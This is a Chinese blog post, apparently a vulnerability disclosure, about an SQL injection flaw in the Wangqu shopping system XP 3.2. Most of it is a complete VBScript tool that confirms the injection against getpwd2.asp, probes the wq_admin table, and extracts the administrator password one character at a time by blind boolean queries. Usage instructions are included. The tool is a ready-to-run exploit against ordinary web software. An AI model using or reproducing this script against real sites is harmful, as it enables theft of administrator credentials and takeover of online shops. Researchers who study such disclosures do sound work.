网趣购物系统XP 3.2注入漏洞

Author:Tr4c3[dot]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
漏洞成因同：
http://www.tr4c3.com/post/220.html
网趣网上购物系统时尚版 v3.2注入漏洞

以官方为例演示：

'Code by [email protected] On Error Resume Next Dim strUrl,strRight Set objArgs = WScript.Arguments If objArgs.Count<>1 Then WScript.Echo "网趣购物系统XP V3.2版注入工具 By Tr4c3[at]126[dot]CoM" WScript.Echo "用于默认配置的猜解，默认管理员admin,adminid=1" WScript.Echo "Usage:Cscript getpass.vbs www.tr4c3.com" WScript.Quit Else strUrl = "http://"&objArgs(0)&"/getpwd2.asp" strFalse="注册" '特征字符 End If


'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
  WScript.Echo "存在注入..."
Else
  WScript.Echo "不存在注入..."
  WScript.Quit
End if
'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
  WScript.Echo "存在wq_admin表..."
Else
  WScript.Echo "不存在wq_admin表，退出！请手工校验。"
  WScript.Quit
End if
'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
  WScript.Echo "存在字段admin..."
Else
  WScript.Echo "不存在字段admin，退出！请手工校验。"
  WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
  WScript.Echo "存在字段password,开始猜解密码..."
Else
  WScript.Echo "不存在字段password，退出！请手工校验。"
  WScript.Quit
End if
'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
  For k = 1 to len(strings) step 1
    If xPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=True Then
      pass = pass & mid(strings,k,1)
      exit For
    End If
  Next
Next
If error Then
  WScript.Echo "error:" & Error.Description
  Error.Clear
Else
  WScript.Echo "Password=" & pass
  Wscript.Quit
End If

'--------------------------------------------------------------------------------------- 'Code by NP Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function '----------------------------------------------------------------------------------------- Function xPosts(strSql) Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.open "POST",strUrl,False xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded" xPost.send strSql data=bytes2BSTR(xPost.responseBody) If InStr(data,strFalse)=0 Then xPosts=True Else xPosts=False End if End function

鬼仔's Blog

发表评论

分类

最新日志

最新评论

鬼仔's Blog